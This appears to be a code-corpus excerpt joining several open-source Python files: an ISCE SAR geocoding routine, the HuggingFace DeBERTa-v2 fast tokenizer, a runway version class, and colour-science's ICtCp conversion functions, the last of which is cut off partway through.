64673
|
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2014 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Authors: <NAME>, <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Comment: Adapted from InsarProc/runGeocode.py
import logging
import stdproc
from stdproc.rectify.geocode.Geocodable import Geocodable
import isceobj
#from contextlib import nested
from iscesys.ImageUtil.ImageUtil import ImageUtil as IU
from iscesys.StdOEL.StdOELPy import create_writer
import os
logger = logging.getLogger('isce.isceProc.runGeocode')
posIndx = 1
def runGeocode(self, prodlist, unwrapflag, bbox):
'''Generalized geocoding of all the files listed above (in prodlist).'''
if isinstance(prodlist, str):
from isceobj.Util.StringUtils import StringUtils as SU
tobeGeocoded = SU.listify(prodlist)
else:
tobeGeocoded = prodlist
#####Remove the unwrapped interferogram if no unwrapping is done
if not unwrapflag:
try:
tobeGeocoded.remove(self._isce.unwrappedIntFilename)
except ValueError:
pass
print('Number of products to geocode: ', len(tobeGeocoded))
stdWriter = create_writer("log", "", True, filename="geo.log")
velocity, height = self._isce.vh()
if bbox is not None:
snwe = list(bbox)
if len(snwe) != 4:
raise ValueError('Bounding box should be a list/tuple of length 4')
else:
snwe = self._isce.topo.snwe
infos = {}
for attribute in ['demCropFilename', 'numberRangeLooks', 'numberAzimuthLooks',
'is_mocomp', 'demImage', 'peg', 'dopplerCentroid']:
infos[attribute] = getattr(self._isce, attribute)
for sceneid1, sceneid2 in self._isce.selectedPairs:
pair = (sceneid1, sceneid2)
for pol in self._isce.selectedPols:
frame1 = self._isce.frames[sceneid1][pol]
formSLC1 = self._isce.formSLCs[sceneid1][pol]
sid = self._isce.formatname(pair, pol)
infos['outputPath'] = os.path.join(self.getoutputdir(sceneid1, sceneid2), sid)
catalog = isceobj.Catalog.createCatalog(self._isce.procDoc.name)
run(tobeGeocoded, frame1, formSLC1, velocity, height, snwe, infos, catalog=catalog, sceneid=sid)
self._isce.procDoc.addAllFromCatalog(catalog)
def run(tobeGeocoded, frame1, formSLC1, velocity, height, snwe, infos, catalog=None, sceneid='NO_ID'):
logger.info("Geocoding Image: %s" % sceneid)
stdWriter = create_writer("log", "", True, filename=infos['outputPath'] + ".geo.log")
planet = frame1.getInstrument().getPlatform().getPlanet()
doppler = infos['dopplerCentroid'].getDopplerCoefficients(inHz=False)[0]
#####Geocode one by one
for prod in tobeGeocoded:
prodPath = infos['outputPath'] + '.' + prod
if not os.path.isfile(prodPath):
logger.info("File not found. Skipping %s" % prodPath) #KK some prods are only in refScene folder! (tbd)
continue
#else:
objGeo = stdproc.createGeocode('insarapp_geocode_' + os.path.basename(prod).replace('.',''))
objGeo.configure()
objGeo.referenceOrbit = formSLC1.getMocompPosition(posIndx)
####IF statements to check for user configuration
if objGeo.minimumLatitude is None:
objGeo.minimumLatitude = snwe[0]
if objGeo.maximumLatitude is None:
objGeo.maximumLatitude = snwe[1]
if objGeo.minimumLongitude is None:
objGeo.minimumLongitude = snwe[2]
if objGeo.maximumLongitude is None:
objGeo.maximumLongitude = snwe[3]
if objGeo.demCropFilename is None:
objGeo.demCropFilename = infos['outputPath'] + '.' + infos['demCropFilename']
if objGeo.dopplerCentroidConstantTerm is None:
objGeo.dopplerCentroidConstantTerm = doppler
if objGeo.bodyFixedVelocity is None:
objGeo.bodyFixedVelocity = velocity
if objGeo.spacecraftHeight is None:
objGeo.spacecraftHeight = height
if objGeo.numberRangeLooks is None:
objGeo.numberRangeLooks = infos['numberRangeLooks']
if objGeo.numberAzimuthLooks is None:
objGeo.numberAzimuthLooks = infos['numberAzimuthLooks']
if objGeo.isMocomp is None:
objGeo.isMocomp = infos['is_mocomp']
objGeo.stdWriter = stdWriter
#create the instance of the image and return the method is supposed to use
ge = Geocodable()
inImage, objGeo.method = ge.create(prodPath)
if objGeo.method is None:
objGeo.method = method
if inImage:
demImage = isceobj.createDemImage()
IU.copyAttributes(infos['demImage'], demImage)
objGeo(peg=infos['peg'], frame=frame1,
planet=planet, dem=demImage, tobegeocoded=inImage,
geoPosting=None, referenceslc=formSLC1)
if catalog is not None:
isceobj.Catalog.recordInputsAndOutputs(catalog, objGeo,
"runGeocode.%s.%s" % (sceneid, prodPath),
logger,
"runGeocode.%s.%s" % (sceneid, prodPath))
stdWriter.finalize()
|
src/transformers/models/deberta_v2/tokenization_deberta_v2_fast.py
|
techthiyanes/transformers
| 8,028 |
64705
|
# coding=utf-8
# Copyright 2020 Microsoft and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fast Tokenization class for model DeBERTa."""
import os
from shutil import copyfile
from typing import Optional, Tuple
from ...file_utils import is_sentencepiece_available
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import logging
if is_sentencepiece_available():
from .tokenization_deberta_v2 import DebertaV2Tokenizer
else:
DebertaV2Tokenizer = None
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "spm.model", "tokenizer_file": "tokenizer.json"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"microsoft/deberta-v2-xlarge": "https://huggingface.co/microsoft/deberta-v2-xlarge/resolve/main/spm.model",
"microsoft/deberta-v2-xxlarge": "https://huggingface.co/microsoft/deberta-v2-xxlarge/resolve/main/spm.model",
"microsoft/deberta-v2-xlarge-mnli": "https://huggingface.co/microsoft/deberta-v2-xlarge-mnli/resolve/main/spm.model",
"microsoft/deberta-v2-xxlarge-mnli": "https://huggingface.co/microsoft/deberta-v2-xxlarge-mnli/resolve/main/spm.model",
}
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"microsoft/deberta-v2-xlarge": 512,
"microsoft/deberta-v2-xxlarge": 512,
"microsoft/deberta-v2-xlarge-mnli": 512,
"microsoft/deberta-v2-xxlarge-mnli": 512,
}
PRETRAINED_INIT_CONFIGURATION = {
"microsoft/deberta-v2-xlarge": {"do_lower_case": False},
"microsoft/deberta-v2-xxlarge": {"do_lower_case": False},
"microsoft/deberta-v2-xlarge-mnli": {"do_lower_case": False},
"microsoft/deberta-v2-xxlarge-mnli": {"do_lower_case": False},
}
class DebertaV2TokenizerFast(PreTrainedTokenizerFast):
r"""
Constructs a DeBERTa-v2 fast tokenizer. Based on [SentencePiece](https://github.com/google/sentencepiece).
Args:
vocab_file (`str`):
[SentencePiece](https://github.com/google/sentencepiece) file (generally has a *.spm* extension) that
contains the vocabulary necessary to instantiate a tokenizer.
do_lower_case (`bool`, *optional*, defaults to `False`):
Whether or not to lowercase the input when tokenizing.
bos_token (`string`, *optional*, defaults to `"[CLS]"`):
The beginning of sequence token that was used during pre-training. Can be used as a sequence classifier token.
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
eos_token (`string`, *optional*, defaults to `"[SEP]"`):
The end of sequence token. When building a sequence using special tokens, this is not the token that is
used for the end of sequence. The token used is the `sep_token`.
unk_token (`str`, *optional*, defaults to `"[UNK]"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
sep_token (`str`, *optional*, defaults to `"[SEP]"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (`str`, *optional*, defaults to `"[PAD]"`):
The token used for padding, for example when batching sequences of different lengths.
cls_token (`str`, *optional*, defaults to `"[CLS]"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
mask_token (`str`, *optional*, defaults to `"[MASK]"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
sp_model_kwargs (`dict`, *optional*):
Will be passed to the `SentencePieceProcessor.__init__()` method. The [Python wrapper for
SentencePiece](https://github.com/google/sentencepiece/tree/master/python) can be used, among other things,
to set:
- `enable_sampling`: Enable subword regularization.
- `nbest_size`: Sampling parameters for unigram. Invalid for BPE-Dropout.
- `nbest_size = {0,1}`: No sampling is performed.
- `nbest_size > 1`: samples from the nbest_size results.
- `nbest_size < 0`: assumes that nbest_size is infinite and samples from all hypotheses (lattice)
using forward-filtering-and-backward-sampling algorithm.
- `alpha`: Smoothing parameter for unigram sampling, and dropout probability of merge operations for
BPE-dropout.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
slow_tokenizer_class = DebertaV2Tokenizer
def __init__(
self,
vocab_file=None,
tokenizer_file=None,
do_lower_case=False,
split_by_punct=False,
bos_token="[CLS]",
eos_token="[SEP]",
unk_token="[UNK]",
sep_token="[SEP]",
pad_token="[PAD]",
cls_token="[CLS]",
mask_token="[MASK]",
**kwargs
) -> None:
super().__init__(
vocab_file,
tokenizer_file=tokenizer_file,
do_lower_case=do_lower_case,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
pad_token=pad_token,
cls_token=cls_token,
mask_token=mask_token,
split_by_punct=split_by_punct,
**kwargs,
)
self.do_lower_case = do_lower_case
self.split_by_punct = split_by_punct
self.vocab_file = vocab_file
self.can_save_slow_tokenizer = False if not self.vocab_file else True
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A DeBERTa sequence has the following format:
- single sequence: [CLS] X [SEP]
- pair of sequences: [CLS] A [SEP] B [SEP]
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + token_ids_1 + sep
def get_special_tokens_mask(self, token_ids_0, token_ids_1=None, already_has_special_tokens=False):
"""
Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` or `encode_plus` methods.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is not None:
return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1]
def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None):
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. A DeBERTa
sequence pair mask has the following format:
```
0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1
| first sequence | second sequence |
```
If `token_ids_1` is `None`, this method only returns the first portion of the mask (0s).
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [token type IDs](../glossary#token-type-ids) according to the given sequence(s).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not self.can_save_slow_tokenizer:
raise ValueError(
"Your fast tokenizer does not have the necessary information to save the vocabulary for a slow "
"tokenizer."
)
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
out_vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file):
copyfile(self.vocab_file, out_vocab_file)
return (out_vocab_file,)
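# Illustrative usage sketch (not part of the original module); it assumes the
# public "microsoft/deberta-v2-xlarge" checkpoint is reachable through
# from_pretrained():
#
#   from transformers import DebertaV2TokenizerFast
#   tokenizer = DebertaV2TokenizerFast.from_pretrained("microsoft/deberta-v2-xlarge")
#   encoded = tokenizer("Hello world", "How are you?")
#   # input_ids follow the [CLS] A [SEP] B [SEP] layout produced by
#   # build_inputs_with_special_tokens(), and token_type_ids follow
#   # create_token_type_ids_from_sequences() above.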
|
runway/utils/_version.py
|
onicagroup/runway
| 134 |
64712
|
"""Version utilities."""
from __future__ import annotations
import packaging.version
class Version(packaging.version.Version):
"""Customize packagining.version.Version."""
def __init__(self, version: str) -> None:
"""Instantiate class.
Args:
version: Version string. (e.g. 1.0.0, v1.0.0)
"""
self._original_text = version
super().__init__(version)
def __repr__(self) -> str:
"""Return repr."""
# this usage of super is required to reproduce the intended result in
# any subclasses of this class
# pylint: disable=super-with-arguments
return f"<Version('{super(Version, self).__str__()}')>"
def __str__(self) -> str:
"""Return the original version string."""
return self._original_text
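# Illustrative example (not part of the original module): __str__() keeps the
# original text while repr() shows the value normalized by packaging.
#
#   >>> v = Version("v1.2.3")
#   >>> str(v)
#   'v1.2.3'
#   >>> repr(v)
#   "<Version('1.2.3')>"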
|
colour/models/rgb/ictcp.py
|
colour-science/colour
| 1,380 |
64723
|
# -*- coding: utf-8 -*-
"""
:math:`IC_TC_P` Colour Encoding
===============================
Defines the :math:`IC_TC_P` colour encoding related transformations:
- :func:`colour.RGB_to_ICtCp`
- :func:`colour.ICtCp_to_RGB`
- :func:`colour.XYZ_to_ICtCp`
- :func:`colour.ICtCp_to_XYZ`
References
----------
- :cite:`Dolby2016a` : Dolby. (2016). WHAT IS ICtCp? - INTRODUCTION.
https://www.dolby.com/us/en/technologies/dolby-vision/ICtCp-white-paper.pdf
- :cite:`InternationalTelecommunicationUnion2018` : International
Telecommunication Union. (2018). Recommendation ITU-R BT.2100-2 - Image
parameter values for high dynamic range television for use in production
and international programme exchange.
https://www.itu.int/dms_pubrec/itu-r/rec/bt/\
R-REC-BT.2100-2-201807-I!!PDF-E.pdf
- :cite:`Lu2016c` : <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., Pytlarz,
J., <NAME>., <NAME>., & <NAME>. (2016). ITP Colour Space and Its
Compression Performance for High Dynamic Range and Wide Colour Gamut Video
Distribution. ZTE Communications, 14(1), 32-38.
"""
import numpy as np
from colour.algebra import vector_dot
from colour.colorimetry import CCS_ILLUMINANTS
from colour.models.rgb import RGB_COLOURSPACES, RGB_to_XYZ, XYZ_to_RGB
from colour.models.rgb.transfer_functions import (
eotf_ST2084, eotf_inverse_ST2084, oetf_HLG_BT2100, oetf_inverse_HLG_BT2100)
from colour.utilities import (domain_range_scale, from_range_1, to_domain_1,
validate_method)
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '<EMAIL>'
__status__ = 'Production'
__all__ = [
'MATRIX_ICTCP_RGB_TO_LMS', 'MATRIX_ICTCP_LMS_TO_RGB',
'MATRIX_ICTCP_LMS_P_TO_ICTCP', 'MATRIX_ICTCP_ICTCP_TO_LMS_P',
'MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2',
'MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2', 'RGB_to_ICtCp', 'ICtCp_to_RGB',
'XYZ_to_ICtCp', 'ICtCp_to_XYZ'
]
MATRIX_ICTCP_RGB_TO_LMS = np.array([
[1688, 2146, 262],
[683, 2951, 462],
[99, 309, 3688],
]) / 4096
"""
*ITU-R BT.2020* colourspace to normalised cone responses matrix.
MATRIX_ICTCP_RGB_TO_LMS : array_like, (3, 3)
"""
MATRIX_ICTCP_LMS_TO_RGB = np.linalg.inv(MATRIX_ICTCP_RGB_TO_LMS)
"""
:math:`IC_TC_P` colourspace normalised cone responses to *ITU-R BT.2020*
colourspace matrix.
MATRIX_ICTCP_LMS_TO_RGB : array_like, (3, 3)
"""
MATRIX_ICTCP_LMS_P_TO_ICTCP = np.array([
[2048, 2048, 0],
[6610, -13613, 7003],
[17933, -17390, -543],
]) / 4096
"""
:math:`LMS_p` *SMPTE ST 2084:2014* encoded normalised cone responses to
:math:`IC_TC_P` colour encoding matrix.
MATRIX_ICTCP_LMS_P_TO_ICTCP : array_like, (3, 3)
"""
MATRIX_ICTCP_ICTCP_TO_LMS_P = np.linalg.inv(MATRIX_ICTCP_LMS_P_TO_ICTCP)
"""
:math:`IC_TC_P` colour encoding to :math:`LMS_p` *SMPTE ST 2084:2014* encoded
normalised cone responses matrix.
MATRIX_ICTCP_ICTCP_TO_LMS_P : array_like, (3, 3)
"""
MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2 = np.array([
[2048, 2048, 0],
[3625, -7465, 3840],
[9500, -9212, -288],
]) / 4096
"""
:math:`LMS_p` *SMPTE ST 2084:2014* encoded normalised cone responses to
:math:`IC_TC_P` colour encoding matrix as given in *ITU-R BT.2100-2*.
MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2 : array_like, (3, 3)
"""
MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2 = np.linalg.inv(
MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2)
"""
:math:`IC_TC_P` colour encoding to :math:`LMS_p` *SMPTE ST 2084:2014* encoded
normalised cone responses matrix as given in *ITU-R BT.2100-2*.
MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2 : array_like, (3, 3)
"""
def RGB_to_ICtCp(RGB, method='Dolby 2016', L_p=10000):
"""
Converts from *ITU-R BT.2020* colourspace to :math:`IC_TC_P` colour
encoding.
Parameters
----------
RGB : array_like
*ITU-R BT.2020* colourspace array.
method : unicode, optional
**{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
Computation method. *Recommendation ITU-R BT.2100* defines multiple
variants of the :math:`IC_TC_P` colour encoding:
- *ITU-R BT.2100-1*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix
from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method.
- *ITU-R BT.2100-2*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and a custom :math:`IC_TC_P`
matrix from :cite:`InternationalTelecommunicationUnion2018`:
*ITU-R BT.2100-2 HLG* method.
L_p : numeric, optional
Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
non-linear encoding. This parameter should stay at its default
:math:`10000 cd/m^2` value for practical applications. It is exposed so
that the definition can be used as a fitting function.
Returns
-------
ndarray
:math:`IC_TC_P` colour encoding array.
Warnings
--------
The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function.
Notes
-----
- The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases
for the *Dolby 2016* method.
- The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function, thus the domain and range values for the *Reference*
and *1* scales are only indicative that the data is not affected by
scale transformations. The effective domain of *SMPTE ST 2084:2014*
inverse electro-optical transfer function (EOTF / EOCF) is
[0.0001, 10000].
+------------+-----------------------+------------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``RGB`` | ``UN`` | ``UN`` |
+------------+-----------------------+------------------+
+------------+-----------------------+------------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] |
| | | |
| | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] |
| | | |
| | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] |
+------------+-----------------------+------------------+
References
----------
:cite:`Dolby2016a`, :cite:`Lu2016c`
Examples
--------
>>> RGB = np.array([0.45620519, 0.03081071, 0.04091952])
>>> RGB_to_ICtCp(RGB) # doctest: +ELLIPSIS
array([ 0.0735136..., 0.0047525..., 0.0935159...])
>>> RGB_to_ICtCp(RGB, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS
array([ 0.6256789..., -0.0198449..., 0.3591125...])
"""
RGB = to_domain_1(RGB)
method = validate_method(method, [
'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'
])
is_hlg_method = 'hlg' in method
is_BT2100_2_method = '2100-2' in method
LMS = vector_dot(MATRIX_ICTCP_RGB_TO_LMS, RGB)
with domain_range_scale('ignore'):
LMS_p = (oetf_HLG_BT2100(LMS)
if is_hlg_method else eotf_inverse_ST2084(LMS, L_p))
ICtCp = (vector_dot(MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2, LMS_p)
if (is_hlg_method and is_BT2100_2_method) else vector_dot(
MATRIX_ICTCP_LMS_P_TO_ICTCP, LMS_p))
return from_range_1(ICtCp)
def ICtCp_to_RGB(ICtCp, method='Dolby 2016', L_p=10000):
"""
Converts from :math:`IC_TC_P` colour encoding to *ITU-R BT.2020*
colourspace.
Parameters
----------
ICtCp : array_like
:math:`IC_TC_P` colour encoding array.
method : unicode, optional
**{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
Computation method. *Recommendation ITU-R BT.2100* defines multiple
variants of the :math:`IC_TC_P` colour encoding:
- *ITU-R BT.2100-1*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix
from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method.
- *ITU-R BT.2100-2*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and a custom :math:`IC_TC_P`
matrix from :cite:`InternationalTelecommunicationUnion2018`:
*ITU-R BT.2100-2 HLG* method.
L_p : numeric, optional
Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
non-linear encoding. This parameter should stay at its default
:math:`10000 cd/m^2` value for practical applications. It is exposed so
that the definition can be used as a fitting function.
Returns
-------
ndarray
*ITU-R BT.2020* colourspace array.
Warnings
--------
The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function.
Notes
-----
- The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases
for the *Dolby 2016* method.
- The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function, thus the domain and range values for the *Reference*
and *1* scales are only indicative that the data is not affected by
scale transformations.
+------------+-----------------------+------------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``ICtCp`` | ``I`` : [0, 1] | ``I`` : [0, 1] |
| | | |
| | ``CT`` : [-1, 1] | ``CT`` : [-1, 1] |
| | | |
| | ``CP`` : [-1, 1] | ``CP`` : [-1, 1] |
+------------+-----------------------+------------------+
+------------+-----------------------+------------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+==================+
| ``RGB`` | ``UN`` | ``UN`` |
+------------+-----------------------+------------------+
References
----------
:cite:`Dolby2016a`, :cite:`Lu2016c`
Examples
--------
>>> ICtCp = np.array([0.07351364, 0.00475253, 0.09351596])
>>> ICtCp_to_RGB(ICtCp) # doctest: +ELLIPSIS
array([ 0.4562052..., 0.0308107..., 0.0409195...])
>>> ICtCp = np.array([0.62567899, -0.01984490, 0.35911259])
>>> ICtCp_to_RGB(ICtCp, method='ITU-R BT.2100-2 HLG') # doctest: +ELLIPSIS
array([ 0.4562052..., 0.0308107..., 0.0409195...])
"""
ICtCp = to_domain_1(ICtCp)
method = validate_method(method, [
'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'
])
is_hlg_method = 'hlg' in method
is_BT2100_2_method = '2100-2' in method
LMS_p = (vector_dot(MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2, ICtCp)
if (is_hlg_method and is_BT2100_2_method) else vector_dot(
MATRIX_ICTCP_ICTCP_TO_LMS_P, ICtCp))
with domain_range_scale('ignore'):
LMS = (oetf_inverse_HLG_BT2100(LMS_p)
if is_hlg_method else eotf_ST2084(LMS_p, L_p))
RGB = vector_dot(MATRIX_ICTCP_LMS_TO_RGB, LMS)
return from_range_1(RGB)
def XYZ_to_ICtCp(XYZ,
illuminant=CCS_ILLUMINANTS[
'CIE 1931 2 Degree Standard Observer']['D65'],
chromatic_adaptation_transform='CAT02',
method='Dolby 2016',
L_p=10000):
"""
Converts from *CIE XYZ* tristimulus values to :math:`IC_TC_P` colour
encoding.
Parameters
----------
XYZ : array_like
*CIE XYZ* tristimulus values.
illuminant : array_like, optional
Source illuminant chromaticity coordinates.
chromatic_adaptation_transform : unicode, optional
**{'CAT02', 'XYZ Scaling', '<NAME>', 'Bradford', 'Sharp',
'Fairchild', 'CMCCAT97', 'CMCCAT2000', 'CAT02 Brill 2008', 'CAT16',
'Bianco 2010', 'Bianco PC 2010'}**,
*Chromatic adaptation* transform.
method : unicode, optional
**{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
Computation method. *Recommendation ITU-R BT.2100* defines multiple
variants of the :math:`IC_TC_P` colour encoding:
- *ITU-R BT.2100-1*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and the :math:`IC_TC_P` matrix
from :cite:`Dolby2016a`: *ITU-R BT.2100-1 HLG* method.
- *ITU-R BT.2100-2*
- *SMPTE ST 2084:2014* inverse electro-optical transfer
function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
:cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
*ITU-R BT.2100-2 PQ* methods.
- *Recommendation ITU-R BT.2100* *Reference HLG* opto-electrical
transfer function (OETF / OECF) and a custom :math:`IC_TC_P`
matrix from :cite:`InternationalTelecommunicationUnion2018`:
*ITU-R BT.2100-2 HLG* method.
L_p : numeric, optional
Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
non-linear encoding. This parameter should stay at its default
:math:`10000 cd/m^2` value for practical applications. It is exposed so
that the definition can be used as a fitting function.
Returns
-------
ndarray
:math:`IC_TC_P` colour encoding array.
Warnings
--------
The underlying *SMPTE ST 2084:2014* transfer function is an absolute
transfer function.
Notes
-----
- The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are aliases
